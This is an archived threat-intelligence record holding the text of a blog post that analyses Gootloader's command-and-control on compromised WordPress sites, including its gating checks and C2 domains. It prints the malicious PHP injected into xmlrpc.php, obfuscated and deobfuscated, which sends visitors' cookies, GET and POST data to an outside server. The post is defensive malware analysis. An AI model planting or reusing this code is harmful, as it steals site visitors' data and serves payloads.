{
	"id": "6e99a0bc-8cd5-4499-afb6-7ba9e653d669",
	"created_at": "2026-04-06T00:10:15.561241Z",
	"updated_at": "2026-04-10T13:11:38.01553Z",
	"deleted_at": null,
	"sha1_hash": "98d6c7ac309f592cd71a55ead9123b98758ba3b1",
	"title": "Gootloader Command \u0026 Control",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 648874,
	"plain_text": "Gootloader Command \u0026 Control\r\nBy gootloadersites\r\nPublished: 2023-01-05 · Archived: 2026-04-05 23:35:51 UTC\r\nIn the previous blog post What is Gootloader?, it was mentioned that Gootloader utilizes compromised WordPress sites.\r\nHow these blogs are compromised, is still a mystery, but they belief is either weak administrator credentials, or\r\nvulnerabilities in the WordPress software (to include themes and plugins).\r\nGootloader maintains persistence on a blog, by adding PHP code to various files, typically in the themes directory, but have\r\nalso seen it in the plugins directory. Additionally, stored in the “wp_options” table, is base64 encoded PHP code is stored,\r\nthis combination allows them to remotely run PHP code.\r\nThis is not an advertisement for the WordPress plugin Wordfence, but it detects the malicious modifications of the files:\r\nThe mechanism of redrawing the forum page is triggered via WordPress filters and actions. It is triggered if the following\r\nconditions are met:\r\nThe visitor isn’t logged into the blog\r\nThe visitor’s class C subnet hasn’t visited the blog in the last 24 hours\r\nThe visitor is visiting from an English-speaking country (or French/Korea for appropriate term)\r\nThe visitor is on a Windows machine\r\nThe visitor is not a crawler (for Google or Bing)\r\nIf the above checks pass, the call out to the “mothership” my-game.biz/5.8.18.7, will cause the page to redraw the page to\r\nthe forum image, as seen below:\r\nhttps://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nPage 1 of 4\n\nWhen the user clicks the link, it redirects to another Gootloader compromised WordPress site, with the URL ending in\r\ndownload.php (current as of 5Jan2023). This filename has changed over the years from content.php, search.php, mail.php,\r\nfaq.php, news.php, and blog.php, but the code has stayed the same. No matter the name of the file, it reaches out to my-game.biz/5.8.18.7, for the malicious zipped .JS file.\r\nRecently, the PowerShell code that runs via the scheduled task, calls out to 10 domains, some of which appear to be false\r\npositives. The URLs always end in xmlrpc.php, which is a legitimate WordPress file. However, they have modified it, to\r\ninclude their obfuscated code (see below).\r\n1\r\n\u003c?php goto boRJO; boRJO: $ch = curl_init(); goto fB1wY; jUCyr: curl_setopt( $ch , CURLOPT_POST, TRUE); goto Hcx\r\ncurl_close( $ch ); goto bi3Dv; HcxAz: curl_setopt( $ch , CURLOPT_RETURNTRANSFER, TRUE); goto b2dAn; N9o8z: $d =\r\n=\u003e serialize( $_SERVER [ \"\\122\\x45\\115\\117\\x54\\x45\\x5f\\x41\\x44\\x44\\122\" ]), \"\\x75\" =\u003e\r\nserialize( $_SERVER [ \"\\x48\\124\\124\\120\\137\\x55\\123\\105\\122\\x5f\\x41\\107\\105\\116\\124\" ]), \"\\x68\" =\u003e\r\nserialize( $_SERVER [ \"\\110\\124\\x54\\x50\\137\\110\\117\\123\\x54\" ]), \"\\x63\" =\u003e serialize( $_COOKIE ), \"\\147\" =\u003e seriali\r\n\"\\160\" =\u003e serialize( $_POST )); goto nLmfD; H36HP: curl_setopt( $ch , CURLOPT_SSL_VERIFYPEER, FALSE); goto N9o8z; b\r\n( strpos ( $r , \"\\x47\\111\\106\\70\\71\" ) !== false) {\r\nheader( \"\\x43\\157\\x6e\\x74\\145\\x6e\\164\\55\\124\\x79\\160\\x65\\x3a\\x20\\151\\x6d\\141\\x67\\x65\\57\\x67\\x69\\146\" ); echo $r ; exit\r\ncmXKz; b2dAn: curl_setopt( $ch , CURLOPT_SSL_VERIFYHOST, 0); goto H36HP; fB1wY: curl_setopt( $ch , CURLOPT_URL,\r\n\"\\150\\164\\164\\x70\\163\\x3a\\x2f\\57\\x77\\x77\\x77\\56\\x69\\x6e\\x65\\x72\\x69\\156\\157\\56\\143\\157\\x2e\\x7a\\141\\x2f\\151\\x6e\\144\\x65\\x78\\x2e\\\r\ngoto jUCyr; LTTGw: $r = curl_exec( $ch ); goto IKqv7; nLmfD: curl_setopt( $ch , CURLOPT_POSTFIELDS, http_build_quer\r\ngoto LTTGw; cmXKz: ?\u003e\r\nHere is the code deobfuscated:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n\u003c?php\r\n$d = array (\r\n\"i\" =\u003e serialize( $_SERVER [ \"REMOTE_ADDR\" ]) ,\r\n\"u\" =\u003e serialize( $_SERVER [ \"HTTP_USER_AGENT\" ]) ,\r\n\"h\" =\u003e serialize( $_SERVER [ \"HTTP_HOST\" ]) ,\r\nhttps://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nPage 2 of 4\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n\"c\" =\u003e serialize( $_COOKIE ) ,\r\n\"g\" =\u003e serialize( $_GET ) ,\r\n\"p\" =\u003e serialize( $_POST )\r\n);\r\n$ch = curl_init();\r\ncurl_setopt( $ch , CURLOPT_POST, true);\r\ncurl_setopt( $ch , CURLOPT_RETURNTRANSFER, true);\r\ncurl_setopt( $ch , CURLOPT_SSL_VERIFYPEER, false);\r\ncurl_setopt( $ch , CURLOPT_URL, https:\r\ncurl_setopt( $ch , CURLOPT_SSL_VERIFYHOST, 0);\r\ncurl_setopt( $ch , CURLOPT_POSTFIELDS, http_build_query( $d ));\r\n$r = curl_exec( $ch );\r\ncurl_close( $ch );\r\nif ( strpos ( $r , \"GIF89\" ) !== false)\r\n{\r\nheader( \"Content-Type: image/gif\" );\r\necho $r ;\r\nexit ;\r\n}\r\n?\u003e\r\nBasically, what happens above, is an infected host, will send a GET request with cookies full of juicy tidbits about the\r\nmachine, to the xmlrpc.php, which will forward it on to the inerino.co.za domain.\r\nUpdate: If the Gootloader operator decides to send code back, it will be returned as a GIF with obfuscated PowerShell code\r\nembedded in it.\r\nUpdate 2: Given that GootLoader inserts the injected PHP block at the start of the xmlrpc.php file and the PHP inject only\r\nexits PHP execution when the gating check is passed on inerino[.]co[.]za, execution of xmlrpc.php will simply fall out of the\r\ninjected GootLoader PHP block and continue execution of the legitimate XML-RPC PHP when the gating check fails. This\r\nmeans that a GET request to a GootLoader xmlrpc.php URL that fails the gating check will behave exactly like a GET\r\nrequest to an uninfected xmlrpc.php URL, making it difficult to tell false positive URLs from true positives.\r\nThis is not an advertisement for the WordPress plugin Wordfence, but it detects the malicious modified xmlrpc.php as seen\r\nbelow:\r\nhttps://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nPage 3 of 4\n\nThis inerino.co.za domain is new to Gootloader C2 and came about around 17 November 2022. The domain is registered to\r\nIvan Boldirev, who was a Serbian Canadian Hockey player. The SSL cert was generated around 17 October 2022.\r\nSource: https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nhttps://gootloader.wordpress.com/2023/01/05/gootloader-command-control/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/"
	],
	"report_names": [
		"gootloader-command-control"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.pdf",
		"text": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.txt",
		"img": "https://archive.orkl.eu/98d6c7ac309f592cd71a55ead9123b98758ba3b1.jpg"
	}
}